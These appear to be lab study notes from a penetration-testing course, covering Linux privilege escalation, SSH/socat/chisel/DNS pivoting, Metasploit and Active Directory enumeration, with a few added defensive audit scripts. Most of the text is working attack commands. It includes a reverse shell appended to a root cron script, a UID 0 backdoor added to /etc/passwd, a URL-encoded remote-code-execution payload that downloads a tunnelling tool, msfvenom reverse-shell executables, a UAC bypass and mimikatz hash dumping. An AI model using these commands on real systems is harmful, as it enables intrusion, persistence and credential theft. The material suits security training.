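Aug 25 04:56:01 debian-privesc CRON[919]: (root) CMD (/usr/sbin/logrotate /etc/logrotate.conf)
Aug 25 04:57:01 debian-privesc CRON[925]: (joe) CMD (/home/joe/bin/cleanup.sh)
Aug 25 04:58:01 debian-privesc CRON[931]: (root) CMD (sh /tmp/sync.sh)
"""

# syslog CRON format: "CRON[pid]: (user) CMD (command)"
_CRON_RE = re.compile(r"CRON\[\d+\]: \((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)\s*$")

# Locations a non-root user can normally write to (assumed list for this example).
RISKY_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")


def parse_cron_log(text):
    """Return [(user, command), ...] for every CRON job execution in the log text."""
    jobs = []
    for line in text.splitlines():
        m = _CRON_RE.search(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd")))
    return jobs


def risky_root_jobs(text):
    """Root-run commands that reference a path under a user-writable location."""
    hits = []
    for user, cmd in parse_cron_log(text):
        if user != "root":
            continue
        paths = [tok for tok in cmd.split() if tok.startswith("/")]
        risky = [p for p in paths if p.startswith(RISKY_PREFIXES)]
        if risky:
            hits.append((cmd, risky))
    return hits


def writable_by_group_or_others(mode):
    """True when st_mode bits allow group or world writes: the condition `ls -lah` reveals.
    Pass os.stat(path).st_mode for a real file."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


if __name__ == "__main__":
    for cmd, risky in risky_root_jobs(SAMPLE_SYSLOG):
        print("root cron job touches user-writable path:", cmd, risky)
```

In an audit, each reported path is then passed through `os.stat` and `writable_by_group_or_others`; a root job whose script is writable by its owner only is a weaker finding, since it still lets that one user escalate, which is exactly the joe case in the notes.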

It is writable; append a one-line reverse shell

cd .scripts
echo >> user_backups.sh
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.118.2 1234 >/tmp/f" >> user_backups.sh
cat user_backups.sh

nc -lnvp 1234

17.3.2 Abusing password authentication

/etc/passwd is writable

openssl passwd w00t
echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2
Password: w00t
id
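
The entry appended above is easy to spot if something is looking for it: a second UID 0 account, and a password hash sitting in /etc/passwd instead of /etc/shadow. The following is an added example (not from the notes or the course): a small /etc/passwd audit that flags both conditions, run over a constructed file that includes the root2 line from the notes.

```python
# Constructed /etc/passwd content (not taken from a real host); the last line is the
# entry the notes append, the others are ordinary accounts for contrast.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
joe:x:1000:1000:joe,,,:/home/joe:/bin/bash
root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash
"""

# Values of the password field that do not carry a usable hash in /etc/passwd.
NO_HASH_MARKERS = {"x", "*", "!", ""}


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; malformed or comment lines are skipped."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            continue
        entries.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                        "home": home, "shell": shell})
    return entries


def audit_passwd(text):
    """Return [(account, reason), ...] for entries a privilege-escalation check should flag."""
    findings = []
    for e in parse_passwd(text):
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "uid 0 account other than root"))
        if e["pw"] not in NO_HASH_MARKERS:
            findings.append((e["name"], "password hash stored in /etc/passwd instead of /etc/shadow"))
    return findings


def uid0_accounts(text):
    """Names of all accounts with UID 0; anything beyond ['root'] needs explaining."""
    return [e["name"] for e in parse_passwd(text) if e["uid"] == 0]


if __name__ == "__main__":
    for account, reason in audit_passwd(SAMPLE_PASSWD):
        print(account, "-", reason)
```

Run against the real file with `audit_passwd(open("/etc/passwd").read())`; the mode of /etc/passwd itself should also be checked, since the whole technique depends on it being writable by someone other than root.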

17.4 Insecure system components

17.4.1 Abusing setuid binaries

Check a file's SUID bit

ls -asl /usr/bin/passwd

find

find /home/joe/Desktop -exec "/usr/bin/bash" -p \;

getcap

/usr/sbin/getcap -r / 2>/dev/null

perl

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

For more SUID escalation techniques see

https://gtfobins.github.io/

17.4.2 Abusing sudo

List the privileged commands the current user may run

sudo -l

Looking at https://gtfobins.github.io/, we find

COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root

It fails with

failed: Permission denied

Check the log

cat /var/log/syslog | grep tcpdump

AppArmor is restricting it; with root, check the AppArmor status

su - root
aa-status
Found:
/usr/sbin/tcpdump

Try apt-get instead

sudo apt-get changelog apt
!/bin/sh

Escalation succeeded

17.4.3 Kernel exploits

Check the architecture and kernel version

cat /etc/issue
uname -r
arch

Search for exploits

searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation"   | grep  "4." | grep -v " < 4.4.0" | grep -v "4.8"
cp /usr/share/exploitdb/exploits/linux/local/45010.c .
head 45010.c -n 20
mv 45010.c cve-2017-16995.c
scp cve-2017-16995.c joe@192.168.123.216:
gcc cve-2017-16995.c -o cve-2017-16995
file cve-2017-16995
./cve-2017-16995

Escalation succeeded


This part covers chapter 18: "Linux port forwarding", "SSH tunnelling" and "Windows port forwarding"; it records the tools and commands used.

18.2 Port forwarding with Linux tools

18.2.3 Port forwarding with socat

On the pivot host

socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432

From Kali, connecting to port 2345 on the pivot is forwarded to 10.4.50.215:5432 on the internal network

psql -h 192.168.50.63 -p 2345 -U postgres

Log in to the PostgreSQL database, list the databases, switch to one, and read the table

\l
\c confluence
select * from cwd_user;

Crack the obtained password hashes

hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt

After cracking the password, set up a port forward on the pivot

socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22

SSH in from Kali

ssh database_admin@192.168.50.63 -p2222

18.3 SSH tunnelling

18.3.1 Local port forwarding

Kali (192) -> pivot 1 (192 and 10) -> pivot 2 (10 and 172) -> target (172)

ssh needs an interactive shell, so upgrade to one on pivot 1 first

python3 -c 'import pty; pty.spawn("/bin/bash")'
ssh database_admin@10.4.50.215
ip addr

Pivot 2 has a 172 subnet; check the routes and scan the 172 subnet for hosts with port 445 open

ip route
for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done

One host is found

172.16.50.217 445

Now we want to reach port 445 on the 172 subnet from Kali

On pivot 1, set up a local port forward through pivot 2 to the 172 subnet

ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215
ss -ntplu

Connect from Kali

smbclient -p 4455 -L //192.168.50.63/ -U hr_admin --password=Welcome1234
smbclient -p 4455 //192.168.50.63/scripts -U hr_admin --password=Welcome1234
ls
get Provisioning.ps1

The .ps1 file on the 172 host was downloaded successfully

18.3.2 Dynamic port forwarding

Kali (192) -> pivot 1 (192 and 10) -> pivot 2 (10 and 172) -> target (172)

Open a SOCKS proxy on port 9999 on pivot 1

python3 -c 'import pty; pty.spawn("/bin/bash")'
ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215

Configure proxychains4 on Kali

tail /etc/proxychains4.conf

socks5 192.168.50.63 9999
proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234

proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217

18.3.3 Remote port forwarding

Kali (192) -> pivot 1 (192 and 10) -> pivot 2 (10 and 172) -> target (172)

Start the SSH service on Kali

sudo systemctl start ssh
sudo ss -ntplu

From pivot 1, SSH to Kali

python3 -c 'import pty; pty.spawn("/bin/bash")'
ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4

Once connected, port 2345 opens on Kali; connecting to Kali's own port 2345 reaches port 5432 on pivot 2

ss -ntplu
psql -h 127.0.0.1 -p 2345 -U postgres

18.3.4 Remote dynamic port forwarding

Kali (192) -> pivot 1 (192 and 10) -> pivot 2 (10 and 172) -> target (172)

From pivot 1, SSH to Kali

python3 -c 'import pty; pty.spawn("/bin/bash")'
ssh -N -R 9998 kali@192.168.118.4

Once connected, a SOCKS proxy is opened on port 9998 on Kali

sudo ss -ntplu
tail /etc/proxychains4.conf
socks5 127.0.0.1 9998
proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.4.50.64

18.3.5 sshuttle

Kali (192) -> pivot 1 (192 and 10) -> pivot 2 (10 and 172) -> target (172)

Set up a port forward on pivot 1

socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22

From Kali, SSH to pivot 2 through the forward on pivot 1 and add the 10 and 172 subnets

sshuttle -r database_admin@192.168.50.63:2222 10.4.50.0/24 172.16.50.0/24

Once connected, Kali can reach the 10 and 172 subnets directly

smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234

18.4 Windows port forwarding tools

18.4.1 ssh.exe

Kali (192) -> Windows pivot 1 (192 and 10) -> target (10)

Start the SSH service on Kali

sudo systemctl start ssh

RDP to pivot 1, locate ssh.exe, and connect to Kali

xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.50.64
where ssh
ssh.exe -V
Port forwarding requires a version above 7.6
ssh -N -R 9998 kali@192.168.118.4

A SOCKS proxy is opened on port 9998 on Kali; after configuring proxychains, hosts on the 10 subnet can be reached

ss -ntplu
tail /etc/proxychains4.conf
socks5 127.0.0.1 9998
proxychains psql -h 10.4.50.215 -U postgres
\l

Kali (192) -> firewall (blocks connections to port 3389 on pivot 1) -> Windows pivot 1 (192)

On Kali, start a web server on port 80 to serve the files

sudo systemctl start apache2
find / -name nc.exe 2>/dev/null
sudo cp /usr/share/windows-resources/binaries/nc.exe /var/www/html/
find / -name plink.exe 2>/dev/null
sudo cp /usr/share/windows-resources/binaries/plink.exe /var/www/html/

nc -nvlp 4446

On pivot 1, use the webshell to download nc and spawn a reverse shell to Kali

powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe
C:\Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 4446
powershell wget -Uri http://192.168.118.4/plink.exe -OutFile C:\Windows\Temp\plink.exe

After downloading plink, SSH to Kali and open port 9833 on Kali, forwarding it to port 3389 on pivot 1

C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4

On Kali, check the listening ports; RDP to local port 9833 reaches port 3389 on pivot 1

ss -ntplu
xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:127.0.0.1:9833

18.4.3 Netsh

Kali (192) -> Windows pivot 1 (192 and 10) -> target (10)

Set up the forward on pivot 1

xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.50.64
Run cmd as administrator
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.64 connectport=22 connectaddress=10.4.50.215

Map port 2222 on the pivot to port 22 on the target; check whether 2222 is listening and list the proxy entries

netstat -anp TCP | find "2222"
netsh interface portproxy show all

Scan port 2222 on the pivot from Kali

sudo nmap -sS 192.168.50.64 -Pn -n -p2222

It fails because the Windows firewall blocks Kali from connecting to port 2222; add a firewall rule allowing inbound connections to 2222

netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.64 localport=2222 action=allow

Kali now reaches the target

sudo nmap -sS 192.168.50.64 -Pn -n -p2222
ssh database_admin@192.168.50.64 -p2222

Remove the firewall rule and the proxy entry

netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64

This part covers chapter 19: "HTTP tunnelling" and "DNS tunnelling"; it records the tools and commands used.

19.1 HTTP tunnelling

19.1.2 Building an HTTP tunnel with chisel

Kali (192) -> Linux pivot 1 (192 and 10) -> target (10)

On Kali, start a web server to serve chisel, and start the chisel server in reverse mode

sudo systemctl start apache2
wget https://github.com/jpillora/chisel/releases/download/v1.8.1/chisel_1.8.1_linux_amd64.gz
gunzip chisel_1.8.1_linux_amd64.gz
sudo cp ./chisel /var/www/html

chisel server --port 8080 --reverse

Download and run it on Linux pivot 1

wget 192.168.118.4/chisel -O /tmp/chisel && chmod +x /tmp/chisel
/tmp/chisel client 192.168.118.4:8080 R:socks > /dev/null 2>&1 &

On Linux pivot 1, commands are executed through a web vulnerability, so they must be URL-encoded

curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.118.4/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%27%29.start%28%29%22%29%7D/

curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.118.4:8080%20R:socks%27%29.start%28%29%22%29%7D/

On Kali, check the listener; the SOCKS service is on port 1080 by default. Install ncat and SSH to the 10 subnet through the local SOCKS port 1080

ss -ntplu
sudo apt install ncat
ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215

19.2 DNS tunnelling

19.2.2 Building a DNS tunnel with dnscat2

Kali (192) -> ... -> pivot (any subnet and 172) -> target (172)

The prerequisite is that DNS queries sent by the pivot, however many times they are forwarded, are ultimately resolved by the server on Kali

Start the dnscat2 server on Kali

dnscat2-server feline.corp

Once started it listens on port 53

Start the dnscat2 client on the pivot

./dnscat feline.corp

When it runs, the server shows the client connecting; inspect and configure the client's forwarding so the 172 target can be reached locally

windows
window -i 1
?
listen --help
listen 127.0.0.1:4455 172.16.2.11:445

smbclient -p 4455 -L //127.0.0.1 -U hr_admin --password=Welcome1234

This part covers chapter 20: "Getting familiar with the Metasploit framework", "MSF payloads", "Post-exploitation with MSF" and "Automating MSF"; it records the tools and commands used.

20.1 Getting familiar with the Metasploit framework

20.1.1 Basic MSF setup

Initialise the database

sudo msfdb init

To start the database at boot

sudo systemctl enable postgresql

Start MSF and check the database status

sudo msfconsole
db_status

Help

help

List and create workspaces

workspace
workspace -a pen200

Run nmap and store the results in the database

db_nmap
db_nmap -A 192.168.50.202

Query hosts, services, and services on a specific port from the database

hosts
services
services -p 8000

Help for a command

show -h

20.1.2 Auxiliary modules

List them

show auxiliary

Search, select, and view the module's description and options

search type:auxiliary smb
use 56
info
show options

Set an option, unset it, populate it from the database, run, and view the results

set RHOSTS 192.168.50.202
unset RHOSTS
services -p 445 --rhosts
run
vulns

Search for and use the SSH login module, then view the valid credentials

search type:auxiliary ssh
use 15
show options
set PASS_FILE /usr/share/wordlists/rockyou.txt
set USERNAME george
set RHOSTS 192.168.50.201
set RPORT 2222
run

creds

20.1.3 Exploit modules

Create a workspace, search for an exploit, view and set the options, set the payload and its options, and run

workspace -a exploits
search Apache 2.4.49
use 0
info
show options
set payload payload/linux/x64/shell_reverse_tcp
show options
set SSL false
set RPORT 80
set RHOSTS 192.168.50.16
run

On success a shell is obtained; press Ctrl+Z then y to background the session. List all sessions, interact with one, and kill one

sessions -l
sessions -i 2
sessions -k 2

Run as a background job and keep listening

run -j
run -z

20.2 MSF payloads

20.2.1 Staged and non-staged payloads

List payloads

show payloads

Generally an underscore indicates a non-staged payload and a slash a staged one, e.g.

shell_reverse_tcp   non-staged
shell/reverse_tcp   staged

20.2.2 Meterpreter payloads

List, select, view the options, and use it within an exploit

show payloads

payload/linux/x64/meterpreter_reverse_tcp

set payload 11
show options
run

Once a session is obtained, view the help

meterpreter > help

System information

sysinfo
getuid

Get a shell, background it, list all channels, and interact with a specific one

shell

Ctrl+Z then y backgrounds the shell
channel -l
channel -i 1

Show the local directory, change it, download a file, read a local file, upload a file, list files on the target, and exit

meterpreter > lpwd

lcd /home/kali/Downloads
download /etc/passwd
lcat /home/kali/Downloads/passwd
upload /usr/bin/unix-privesc-check /tmp/
ls /tmp
exit

20.2.3 Executable payloads

List, generate (non-staged), download, execute, and catch the shell

msfvenom -l payloads --platform windows --arch x64
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o nonstaged.exe
iwr -uri http://192.168.119.2/nonstaged.exe -Outfile nonstaged.exe
.\nonstaged.exe
nc -nvlp 443

Staged payloads must be caught with MSF's multi/handler; a shell caught with an nc listener cannot execute commands

Generate, start msf, and use multi/handler

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o staged.exe

use multi/handler
set payload windows/x64/shell/reverse_tcp
show options
set LHOST 192.168.119.2
set LPORT 443
run

Run in the background and list jobs

run -j
jobs

20.3 Post-exploitation with MSF

20.3.1 Core post-exploitation features

Generate the payload, upload it, run it, and get a shell

msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.119.4 LPORT=443 -f exe -o met.exe
use multi/handler
set payload windows/x64/meterpreter_reverse_https
set LPORT 443
run

nc 192.168.50.223 4444
powershell
iwr -uri http://192.168.119.2/met.exe -Outfile met.exe
.\met.exe

Post-exploitation features: idle time, privilege escalation, process migration, and running with a hidden window

idletime

shell
whoami /priv
SeImpersonatePrivilege is present
exit
getuid
getsystem
getuid


ps
migrate 8052
ps
getuid

execute -H -f notepad
migrate 2720

20.3.2 Post-exploitation modules

Bypass UAC

getsystem
ps
migrate 8044
getuid
Server username: ITWK01\offsec

shell
powershell -ep bypass
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel
Medium means UAC is in effect

Ctrl+Z then y to background the shell
bg
search UAC
use exploit/windows/local/bypassuac_sdclt
show options
set SESSION 9
set LHOST 192.168.119.4
run

shell
powershell -ep bypass
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel
High

Dump hashes with mimikatz

use exploit/multi/handler
run
getsystem
load kiwi
help
creds_msv

20.3.3 Routing and proxies

ipconfig
Two interfaces are found (192 and 172 subnets)

meterpreter > bg
[*] Backgrounding session 12...

route add 172.16.5.0/24 12
route print

IPv4 Active Routing Table
=========================

Subnet Netmask Gateway
------ ------- -------
172.16.5.0 255.255.255.0 Session 12

Port scan
use auxiliary/scanner/portscan/tcp
set RHOSTS 172.16.5.200
set PORTS 445,3389
run

use exploit/windows/smb/psexec
set SMBUser luiza
set SMBPass "BoccieDearAeroMeow1!"
set RHOSTS 172.16.5.200
set payload windows/x64/meterpreter/bind_tcp
set LPORT 8000
run

Automatic routing

use multi/manage/autoroute
show options
sessions -l
set session 12
run
This automatically adds routes for the 192 and 172 subnets

Set up a proxy

use auxiliary/server/socks_proxy
show options
set SRVHOST 127.0.0.1
set VERSION 5
run -j

The default port is 1080

Configure and use it

tail /etc/proxychains4.conf

socks5 127.0.0.1 1080

sudo proxychains xfreerdp /v:172.16.5.200 /u:luiza

Port forwarding

sessions -i 12
portfwd -h
portfwd add -l 3389 -p 3389 -r 172.16.5.200
sudo xfreerdp /v:127.0.0.1 /u:luiza

20.4 Automating MSF

20.4.1 Resource scripts

Create the script file listener.rc

use exploit/multi/handler
set PAYLOAD windows/meterpreter_reverse_https
set LHOST 192.168.119.4
set LPORT 443
set AutoRunScript post/windows/manage/migrate
set ExitOnSession false
run -z -j

Load the script

sudo msfconsole -r listener.rc

Run the payload

iwr -uri http://192.168.119.4/met.exe -Outfile met.exe
.\met.exe

A shell is obtained, automatically migrated to a notepad process, and kept in the background

Other bundled scripts

ls -l /usr/share/metasploit-framework/scripts/resource

This part covers chapter 21: "Manual AD enumeration", "Manual AD enumeration, extended" and "Automated AD enumeration"; it records the tools and commands used.

21.2 Manual AD enumeration

21.2.1 Legacy Windows tools

Enumerate domain users, query a specific user, query domain groups, and query group members

xfreerdp /u:stephanie /d:corp.com /v:192.168.50.75
net user /domain
net user jeffadmin /domain
net group /domain
net group "Sales Department" /domain

21.2.2 Enumeration with PowerShell and .NET

Current domain information

[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

Write a script and run it

enumeration.ps1

# Store the domain object in the $domainObj variable
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# Print the variable
$domainObj
powershell -ep bypass
.\enumeration.ps1

Query the domain controller

# Store the domain object in the $domainObj variable
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# Store the PdcRoleOwner name to the $PDC variable
$PDC = $domainObj.PdcRoleOwner.Name

# Print the $PDC variable
$PDC

Retrieve the DN with ADSI

([adsi]'').distinguishedName
# Store the domain object in the $domainObj variable
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# Store the PdcRoleOwner name to the $PDC variable
$PDC = $domainObj.PdcRoleOwner.Name

# Store the Distinguished Name variable into the $DN variable
$DN = ([adsi]'').distinguishedName

# Print the $DN variable
$DN

LDAP enumeration

$PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName
$LDAP = "LDAP://$PDC/$DN"
$LDAP
PS C:\Users\stephanie> .\enumeration.ps1
LDAP://DC1.corp.com/DC=corp,DC=com

21.2.3 Adding search functionality to the script

Search with DirectoryEntry and DirectorySearcher

$PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName
$LDAP = "LDAP://$PDC/$DN"

$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)

$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.FindAll()

This returns a lot; narrow it down to user accounts

$PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName
$LDAP = "LDAP://$PDC/$DN"

$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)

$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.filter="samAccountType=805306368"
$dirsearcher.FindAll()

Enumerate every property

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = $domainObj.PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName
$LDAP = "LDAP://$PDC/$DN"

$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)

$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.filter="samAccountType=805306368"
$result = $dirsearcher.FindAll()

Foreach($obj in $result)
{
Foreach($prop in $obj.Properties)
{
$prop
}

Write-Host "-------------------------------"
}

Check the groups a user (jeffadmin) belongs to

$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.filter="name=jeffadmin"
$result = $dirsearcher.FindAll()

Foreach($obj in $result)
{
Foreach($prop in $obj.Properties)
{
$prop.memberof
}

Write-Host "-------------------------------"
}

Wrap it in a function so the query can be passed as a parameter

function LDAPSearch {
param (
[string]$LDAPQuery
)

$PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
$DistinguishedName = ([adsi]'').distinguishedName

$DirectoryEntry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$PDC/$DistinguishedName")

$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher($DirectoryEntry, $LDAPQuery)

return $DirectorySearcher.FindAll()

}

To use it, import it first

Import-Module .\function.ps1

Search for users and groups

LDAPSearch -LDAPQuery "(samAccountType=805306368)"
LDAPSearch -LDAPQuery "(objectclass=group)"

List the objects in each group

foreach ($group in $(LDAPSearch -LDAPQuery "(objectCategory=group)")) {$group.properties | select {$_.cn}, {$_.member}}

Members of a specific group

$sales = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Sales Department))"
$sales.properties.member

If groups are nested, the same method can be repeated on the member groups

21.2.4 Enumerating AD with PowerView

Import

Import-Module .\PowerView.ps1

Enumerate the domain, users, user names, selected user attributes, group names, and group members

Get-NetDomain
Get-NetUser
Get-NetUser | select cn
Get-NetUser | select cn,pwdlastset,lastlogon
Get-NetGroup | select cn
Get-NetGroup "Sales Department" | select member

21.3 Manual AD enumeration, extended

21.3.1 Enumerating operating systems

Continuing with PowerView: enumerate domain computers and select hostname and operating system

Get-NetComputer
Get-NetComputer | select operatingsystem,dnshostname

21.3.2 Getting logged-on users

Find which domain hosts the current user has local admin access to

Find-LocalAdminAccess

Query domain hosts as the current user

Get-NetSession -ComputerName files04 -Verbose
Get-NetSession -ComputerName web04 -Verbose

Without permission this shows
VERBOSE: [Get-NetSession] Error: Access is denied

If access is permitted

Get-NetSession -ComputerName client74

CName : \\192.168.50.75
UserName : stephanie
Time : 8
IdleTime : 0
ComputerName : client74

On Windows 11 this information may not be retrievable remotely due to insufficient permissions; check for hosts running older versions

Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion

Other tools can then be tried to enumerate logged-on users, e.g. PsLoggedOn

.\PsLoggedon.exe \\files04
Failure:
Unable to query resource logons
Success:
Users logged on locally:
<unknown time> CORP\jeffadmin

Users logged on via resource shares:
10/5/2022 1:33:32 AM CORP\stephanie

21.3.3 Enumeration through SPNs (service principal names)

List an account's SPNs (this queries the DC)

setspn -L iis_service

PowerView can also enumerate them

Get-NetUser -SPN | select samaccountname,serviceprincipalname

For the web service in the results, resolve the hostname to its IP

nslookup.exe web04.corp.com

21.3.4 Enumerating object permissions

Enumerate the current user's ACL with PowerView

Get-ObjectAcl -Identity stephanie

Convert the SIDs in the results to object names

Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104
Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-553

This shows that the SecurityIdentifier holds the ActiveDirectoryRights ReadProperty over the ObjectSID

Find everyone with GenericAll over the "Management Department" group

Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

Resolve all SIDs in the results

"S-1-5-21-1987370270-658905905-1781884369-512","S-1-5-21-1987370270-658905905-1781884369-1104","S-1-5-32-548","S-1-5-18","S-1-5-21-1987370270-658905905-1781884369-519" | Convert-SidToName

The current user has the right, so add ourselves to the Management Department group

net group "Management Department" stephanie /add /domain
Get-NetGroup "Management Department" | select member

It succeeds; now remove it again

net group "Management Department" stephanie /del /domain
Get-NetGroup "Management Department" | select member

21.3.5 Enumerating domain shares

PowerView

Find-DomainShare

Access the domain shares from PowerShell

ls \\dc1.corp.com\sysvol\corp.com\
ls \\dc1.corp.com\sysvol\corp.com\Policies\
cat \\dc1.corp.com\sysvol\corp.com\Policies\oldpolicy\old-policy-backup.xml

The obtained hash can be decrypted on Kali

gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"

Look through the other shares for sensitive files

ls \\FILES04\docshare
ls \\FILES04\docshare\docs\do-not-share
cat \\FILES04\docshare\docs\do-not-share\start-email.txt

The email contains a cleartext password

21.4 Automated enumeration

21.4.1 Automated enumeration with SharpHound

Import and help

Import-Module .\Sharphound.ps1
Get-Help Invoke-BloodHound

Collect domain data

Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\stephanie\Desktop\ -OutputPrefix "corp audit"

This produces a zip file; download it for analysis

21.4.2 Analysis with BloodHound

Start the database on Kali

sudo neo4j start

http://localhost:7474
neo4j/neo4j

After logging in you are prompted to change the password

Start BloodHound

bloodhound

After logging in to the neo4j database, import the zip file in the GUI. "Database Info" shows all domain-related information, and "Analysis" lists the pre-built queries, e.g.

Find all Domain Admins
Shortest Paths
View the shortest paths

Right-click compromised users and hosts and select "Mark User as Owned", then recompute the shortest path to the domain controller


This part covers chapter 22: "AD authentication" and "Attacks on AD authentication"; it records the tools and commands used.

22.1 AD authentication

22.1.1 NTLM authentication

Used when authenticating by IP address; seven steps in total

client — server — DC

The client computes the NTLM hash from the password
The client sends the username to the server
The server returns a random challenge (nonce) to the client
The client encrypts the nonce with the NTLM hash to form the response and sends it to the server
The server forwards the response, username and nonce to the DC
The DC, which holds every user's NTLM hash, decrypts the response with that user's hash and checks that the nonce matches
The DC sends the result back to the server
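
The seven steps above are easier to reason about when each party is a piece of code that can only see the messages it actually receives. The following is an added example (not from the notes or the course): a simulation of the exchange with a client, a server and a DC, where the server never holds the user's hash, only the DC verifies, and a captured response cannot be replayed against a fresh challenge. It is a model of the flow, not real NTLM: the NT hash stand-in uses SHA-256 instead of MD4 (MD4 is disabled in many OpenSSL builds), and the response is an HMAC-MD5 over the challenge, which is the NTLMv2 construction in simplified form. Account names and passwords are constructed for the example.

```python
import hashlib
import hmac
import os


def nt_hash(password):
    """Step 1. Stand-in for the NT hash: real NTLM uses MD4 over the UTF-16LE password;
    SHA-256 is used here only so the example runs everywhere. The flow is unchanged."""
    return hashlib.sha256(password.encode("utf-16-le")).digest()


def compute_response(key, nonce):
    """Step 4. Prove knowledge of the hash without sending it: a keyed MAC over the nonce
    (NTLMv2 is an HMAC-MD5 construction; the extra fields it mixes in are omitted here)."""
    return hmac.new(key, nonce, "md5").digest()


class DomainController:
    """Holds every user's hash (never the password) and performs steps 6 and 7."""

    def __init__(self, accounts):
        self._hashes = {user: nt_hash(pw) for user, pw in accounts.items()}

    def verify(self, username, nonce, response):
        key = self._hashes.get(username)
        if key is None:
            return False
        return hmac.compare_digest(compute_response(key, nonce), response)


class Server:
    """Issues challenges (step 3) and relays (username, nonce, response) to the DC (step 5).
    It keeps a transcript of what it saw, which never includes a hash or password."""

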